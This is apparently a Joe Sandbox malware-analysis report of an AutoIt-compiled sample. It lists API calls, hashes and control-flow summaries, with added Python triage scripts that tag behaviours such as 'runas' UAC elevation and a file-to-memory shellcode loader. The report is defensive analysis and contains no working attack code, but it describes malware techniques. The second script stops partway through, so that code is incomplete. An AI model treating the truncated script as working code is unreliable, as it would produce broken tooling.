                                                                      • Opcode ID: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
                                                                      • Instruction ID: 5a827c6c20eeb1e3bf1b46455a2c64685be6b4cee80763da5124aa17cc3f121c
                                                                      • Opcode Fuzzy Hash: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
                                                                      • Instruction Fuzzy Hash: 33A1AF7691E2C0CFCB11CB6D688679D7EE4AB67700B0C48D9E88D97B72D7604A84CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      (rendered graph omitted; node summary) control_flow_graph 660: ba42a2-ba42ba CreateStreamOnHGlobal; ba42bc-ba42d3 FindResourceExW; be35ba-be35c9 LoadResource; be35cf-be35dd SizeofResource; be35e3-be35ee LockResource; be35f4-be3612 (no API calls); every node also edges to ba42d9 -> ba42da-ba42dd.
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BA42B2
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42C9
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35BE
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35D3
                                                                      • LockResource.KERNEL32(00BA50AA,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20,?), ref: 00BE35E6
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
                                                                      • Instruction ID: a6dd6a417527cd41f70e930dbdcfcad3f3c5ec40e13291b6ccc8d200e9fce0c5
                                                                      • Opcode Fuzzy Hash: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
                                                                      • Instruction Fuzzy Hash: 44118E71250700BFDB258B65DC88F2B7BF9EBC6B51F1081A9F412E6290DBB1DC048720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                                        • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • GetForegroundWindow.USER32 ref: 00BE2C10
                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00C62224), ref: 00BE2C17
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                      • String ID: runas
                                                                      • API String ID: 448630720-4000483414
                                                                      • Opcode ID: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
                                                                      • Instruction ID: da9943d95218873ea81f685ee95af72df766417e60de403edff8d5f47a53db72
                                                                      • Opcode Fuzzy Hash: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
                                                                      • Instruction Fuzzy Hash: 8E11D63110C3415BCB14FF68D891ABE77E4DB93750F4854ADF586520A2DF21894A9712
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
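The function blocks above carry the behaviours an analyst pulls out of this listing: OS and architecture fingerprinting (GetVersionExW, IsWow64Process, GetNativeSystemInfo resolved at run time through GetProcAddress), the RT_RCDATA (type 0x0A) resource named "SCRIPT" that a compiled AutoIt stub loads with FindResourceExW, and ShellExecuteW with the "runas" verb, which triggers a UAC elevation prompt. The Python below is an added example, not part of the Joe Sandbox report, the IDA plugin or the AutoIt runtime: it parses API lines in the plugin's "• Api.MODULE(args), ref: ADDR" list format plus the "String ID" line of the Similarity section and tags those behaviours. The sample input is constructed from lines copied from the blocks above; the tag names and rule set are ours, and the "SCRIPT" test assumes the well-known layout of compiled AutoIt executables (script body stored as an RCDATA resource named SCRIPT).

```python
import re

# Constructed sample: API lines in the Joe Sandbox IDA-plugin "APIs" list
# format and "String ID" lines from the Similarity sections, copied from the
# function blocks on this page. Grouping them into one input is ours.
SAMPLE_REPORT = """\
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BA42B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42C9
• LoadResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35BE
• String ID: SCRIPT
• SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
  • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
• GetForegroundWindow.USER32 ref: 00BE2C10
• ShellExecuteW.SHELL32(00000000,?,?,00C62224), ref: 00BE2C17
• String ID: runas
• GetCurrentProcess.KERNEL32(?,00C3CB64,00000000,?,?), ref: 00BA4422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA4429
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00BA4466
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00BA4474
• String ID: GetNativeSystemInfo$kernel32.dll$|O$=
"""

# One "• Api.MODULE(args), ref: ADDR" line; the argument list and the leading
# "Part of subcall function XXXX:" prefix are both optional in the report.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")

RT_RCDATA = 0x0A  # resource type the AutoIt stub uses for its script body


def parse_report(text):
    """Return (calls, strings) from plugin-format text.

    calls: list of dicts {api, module, args, ref, subcall};
    strings: the '$'-separated entries of every String ID line.
    """
    calls, strings = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            calls.append({
                "api": m.group("api"),
                "module": m.group("mod"),
                "args": args.split(",") if args is not None else [],
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub") is not None,
            })
            continue
        m = STR_RE.match(line)
        if m:
            strings.extend(s for s in m.group("ids").split("$") if s)
    return calls, strings


def _as_hex(arg):
    """Report arguments are hex literals, '?' for unknown, or a string."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def classify(calls, strings):
    """Map parsed calls and strings to behaviour tags (tag names are ours)."""
    apis = {c["api"] for c in calls}
    tags = {}
    # Compiled AutoIt stub: FindResourceExW(hModule, RT_RCDATA, "SCRIPT", lang).
    for c in calls:
        if (c["api"] == "FindResourceExW" and len(c["args"]) >= 3
                and _as_hex(c["args"][1]) == RT_RCDATA
                and c["args"][2] == "SCRIPT"):
            tags["autoit_script_resource"] = f"FindResourceExW @ {c['ref']:08X}"
    # Elevation prompt: ShellExecuteW in a function that references "runas".
    if "ShellExecuteW" in apis and "runas" in strings:
        tags["runas_elevation"] = "ShellExecuteW with verb 'runas'"
    # Runtime export resolution: GetProcAddress with a literal name argument.
    resolved = {c["args"][1] for c in calls
                if c["api"] == "GetProcAddress" and len(c["args"]) >= 2
                and c["args"][1] != "?" and _as_hex(c["args"][1]) is None}
    if resolved:
        tags["dynamic_api_resolution"] = sorted(resolved)
    # Architecture fingerprint: IsWow64Process plus (Native)GetSystemInfo.
    if "IsWow64Process" in apis and apis & {"GetNativeSystemInfo", "GetSystemInfo"}:
        tags["wow64_arch_fingerprint"] = "IsWow64Process + GetNativeSystemInfo/GetSystemInfo"
    return tags


def triage(text):
    """Parse one or more plugin blocks and return the behaviour tags."""
    return classify(*parse_report(text))


if __name__ == "__main__":
    for tag, detail in triage(SAMPLE_REPORT).items():
        print(f"{tag:26} {detail}")
```

The "runas" rule needs the String ID line because the report shows the verb argument of ShellExecuteW only as a pointer (00C62224); the string itself surfaces in the Similarity section. Any of these tags on its own is weak (the architecture check is ordinary AutoIt runtime code), so treat them as triage hints to be confirmed against the extracted script, not as verdicts.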

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00BE5222), ref: 00C0DBCE
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00C0DBDD
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00C0DBEE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0DBFA
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                                      • Instruction ID: fe24c1004dd8a196e86a7f776994fada3b88bdc3eb72679568397f8a9043aff6
                                                                      • Opcode Fuzzy Hash: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                                      • Instruction Fuzzy Hash: F2F0A03182092057D3206BB8AC4DAAF3B6C9E01334B104702F836D20F0EBB15A54CA95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00BCE505), ref: 00BD337E
                                                                      Similarity
                                                                      • API ID: Time$FileSystem
                                                                      • String ID: GetSystemTimePreciseAsFileTime
                                                                      • API String ID: 2086374402-595813830
                                                                      • Opcode ID: e6d8d8b96e06fe111829b4d7aea8184a40ba81ea377cdcdcf7b3a95f7697b060
                                                                      • Instruction ID: be152c044920fd4177a198ff349b8ced69e38ed4afa3b30a5f92be24d9f4d468
                                                                      • Opcode Fuzzy Hash: e6d8d8b96e06fe111829b4d7aea8184a40ba81ea377cdcdcf7b3a95f7697b060
                                                                      • Instruction Fuzzy Hash: D6E0E531A50218BBD3206BA59C43F7EFBE0EF54B20B8401A9F8055B651DDA14E0097DA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00BC09DA
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                                      • Instruction ID: a245283cef81f1873c8332e72d379cc53c28ce91ee94d426ff211a26d772293b
                                                                      • Opcode Fuzzy Hash: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00BAD807
                                                                      • timeGetTime.WINMM ref: 00BADA07
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB28
                                                                      • TranslateMessage.USER32(?), ref: 00BADB7B
                                                                      • DispatchMessageW.USER32(?), ref: 00BADB89
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB9F
                                                                      • Sleep.KERNEL32(0000000A), ref: 00BADBB1
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 2189390790-0
                                                                      • Opcode ID: b8be5e20b6d23e4bf2d2a9961aff33cee2fc055abedb1892e37f726a8b542098
                                                                      • Instruction ID: 0e159acf8913b425c1f7fcddb3605f0f61d277c70c8426d6c6fb1c317c2febd5
                                                                      • Opcode Fuzzy Hash: b8be5e20b6d23e4bf2d2a9961aff33cee2fc055abedb1892e37f726a8b542098
                                                                      • Instruction Fuzzy Hash: 0642D270608245EFD724CF24C885BBEB7E0FF46314F548A99E956876A1D770E888CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      (rendered graph omitted; node summary) control_flow_graph 301: be065b-be068b call be042f; be06a6-be06b2 call bd5221; be06cb-be0714 call be039a (CreateFileW); be0727-be0754 second call be039a; be0756-be077c GetLastError, call bcf2a3; be0781-be078a GetFileType; be078c-be07bd GetLastError, call bcf2a3, CloseHandle; be07e9-be0837 call bd516a; be0839-be0845 call be05ab; be0847-be086b call be014d; be086f-be0879 call bd86ae; be08fc-be092f CloseHandle, call be039a; be0931-be095d GetLastError, call bcf2a3, call bd5333; be097d-be0983 exit.
                                                                      APIs
                                                                        • Part of subcall function 00BE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000), ref: 00BE03B7
                                                                      • GetLastError.KERNEL32 ref: 00BE076F
                                                                      • __dosmaperr.LIBCMT ref: 00BE0776
                                                                      • GetFileType.KERNELBASE ref: 00BE0782
                                                                      • GetLastError.KERNEL32 ref: 00BE078C
                                                                      • __dosmaperr.LIBCMT ref: 00BE0795
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00BE07B5
                                                                      • CloseHandle.KERNEL32(?), ref: 00BE08FF
                                                                      • GetLastError.KERNEL32 ref: 00BE0931
                                                                      • __dosmaperr.LIBCMT ref: 00BE0938
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                                      • Instruction ID: dd7f728e3958d2194c2cc81d58a96596140589a5693ad5fa8f40b78accd84a3f
                                                                      • Opcode Fuzzy Hash: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                                      • Instruction Fuzzy Hash: 58A12732A241858FDF19AF68D891BAD7BE1EB06320F24019DF815AF391D7719C52CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                                        • Part of subcall function 00BA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA3379
                                                                      • RegOpenKeyExW.KERNEL32 ref: 00BA356A
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BE318D
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00BE31CE
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00BE3210
                                                                      • _wcslen.LIBCMT ref: 00BE3277
                                                                      • _wcslen.LIBCMT ref: 00BE3286
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-2727554177
                                                                      • Opcode ID: d90a1199a601abfb81400bda2b43e6c29a263fb46987bf216f34096ea6195e77
                                                                      • Instruction ID: 1cb656bf6837cd50c13a6efe6eb9a0c68239e14e2f39c544110a232966deea75
                                                                      • Opcode Fuzzy Hash: d90a1199a601abfb81400bda2b43e6c29a263fb46987bf216f34096ea6195e77
                                                                      • Instruction Fuzzy Hash: C3716C714083019EC714DF65DC86AAFBBE8FF85740F40486EF589971B0EB749A88CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32 ref: 00BA2B8E
                                                                      • LoadCursorW.USER32 ref: 00BA2B9D
                                                                      • LoadIconW.USER32 ref: 00BA2BB3
                                                                      • LoadIconW.USER32 ref: 00BA2BC5
                                                                      • LoadIconW.USER32 ref: 00BA2BD7
                                                                      • LoadImageW.USER32 ref: 00BA2BEF
                                                                      • RegisterClassExW.USER32(?), ref: 00BA2C40
                                                                        • Part of subcall function 00BA2CD4: GetSysColorBrush.USER32 ref: 00BA2D07
                                                                        • Part of subcall function 00BA2CD4: RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                                        • Part of subcall function 00BA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                                        • Part of subcall function 00BA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                                        • Part of subcall function 00BA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                                        • Part of subcall function 00BA2CD4: LoadIconW.USER32 ref: 00BA2D85
                                                                        • Part of subcall function 00BA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                                      • Instruction ID: b9479b51329311dbee1999ce43af53599c62661c670dfda503b6c095f151123f
                                                                      • Opcode Fuzzy Hash: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                                      • Instruction Fuzzy Hash: FC212C75E10314ABDB109FA9EC95BAD7FB8FB48B50F08405AFA08B66B0D7B14584CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Graph image not captured in this export. Basic blocks span ba3170-ba326d, with out-of-line chunks at be2d9c-be2e96. Win32 calls on the graph: DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow, SetFocus. Internal calls: ba18e2, bbe499, c0bf30, ba30f2, ba3c50, c0c161, c00ad7, ba326f, ba3837.
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BA316A,?,?), ref: 00BA31D8
                                                                      • KillTimer.USER32 ref: 00BA3204
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BA3227
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BA316A,?,?), ref: 00BA3232
                                                                      • CreatePopupMenu.USER32 ref: 00BA3246
                                                                      • PostQuitMessage.USER32 ref: 00BA3267
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                                      • Instruction ID: fed6f469296af68d4a6d5b11d7fa5aeec69ba4551373413fec8a8a573b160c78
                                                                      • Opcode Fuzzy Hash: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                                      • Instruction Fuzzy Hash: 4B413B3125C304ABDF145B7C9C8EB7D3AD9E747B40F0841A6FE0AA61A1CB71CE8097A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Graph image not captured in this export. Basic blocks span bd8d45-bd90f9. Win32 calls on the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError. Internal calls: bcf2c6, bcf2d9, bd27ec, bd3820, bd29c8, bd9424, bdf89b, bcf2a3, bd8a61, bd88a1, bd8bb1.
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bdbdcb516b41f2199fafdec64757545d3685a5e52768c8844dadaf665599d01
                                                                      • Instruction ID: 7295aff2e4bcdf2238edd0132d2a23a8bba2a8a2fee7f410a3fd238b7029ab40
                                                                      • Opcode Fuzzy Hash: 3bdbdcb516b41f2199fafdec64757545d3685a5e52768c8844dadaf665599d01
                                                                      • Instruction Fuzzy Hash: 96C1D274A04289AFDB11DFA8D881BADFBF5EF09310F1441DAF519AB392E7309941CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Graph image not captured in this export. Basic blocks span 112650-112952. Win32 calls on the graph, in address order: CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc, CloseHandle, VirtualFree, VirtualFree; the edge 659->609 leads from the last block back to the CreateFileW block. Internal calls: 110000, 113560, 1137b0, 1135c0.
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00112721
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00112947
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                                      • Instruction ID: 64025bea54c5aadf56d55b27788d5c2507f5638213486a0094376ab8d8107d8f
                                                                      • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                                      • Instruction Fuzzy Hash: 2FA11874E00209EBDB18CFA4C894BEEBBB5FF58304F208169E515BB280D7759A91DF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
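The function at 00112650 above sits in a memory region the report marks as not PE-backed, and its graph opens a file, allocates memory, reads the file into it and releases the buffer on the way out. The Python below is an added example, not code from Joe Sandbox or from the sample: it parses API and Memory Dump Source lines in the format shown in this report, decodes the captured CreateFileW and VirtualFree arguments with the standard Win32 constants, and flags the file-to-memory loader shape only when the code is not image-backed. Assumptions: the captured argument lists are raw stack slots, so the real CreateFileW parameters may start one slot in (the decoder takes the first self-consistent window); the graph call orders and both sample blocks are constructed copies of the lines shown above, the second being the CRT file-open routine at 00BE065B inside the AutoIt runtime image.

```python
"""Decode Joe Sandbox API lines and flag the file-to-memory loader shape.

Added example; not code from Joe Sandbox. The SAMPLE_* blocks are constructed
copies of lines shown in this report.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: APIs and Memory Dump Source lines of the function at 00112650.
SAMPLE_SHELLCODE = """\
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00112721
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00112947
• Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
"""
# Call names in graph order for the same function (taken from its control-flow graph).
SHELLCODE_GRAPH = ["CreateFileW", "VirtualAlloc", "ReadFile", "VirtualAlloc", "CloseHandle", "VirtualFree"]

# Constructed input: the CRT file-open routine at 00BE065B inside the AutoIt runtime image.
SAMPLE_CRT = """\
  • Part of subcall function 00BE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000), ref: 00BE03B7
• GetFileType.KERNELBASE ref: 00BE0782
• CloseHandle.KERNEL32(00000000), ref: 00BE07B5
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
"""
CRT_GRAPH = ["CreateFileW", "GetFileType", "GetLastError", "CloseHandle"]

API_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File: .*?, Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")

# Win32 constants (winnt.h / fileapi.h / memoryapi.h) used to decode captured arguments.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRIB = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL", 0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
FREE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}


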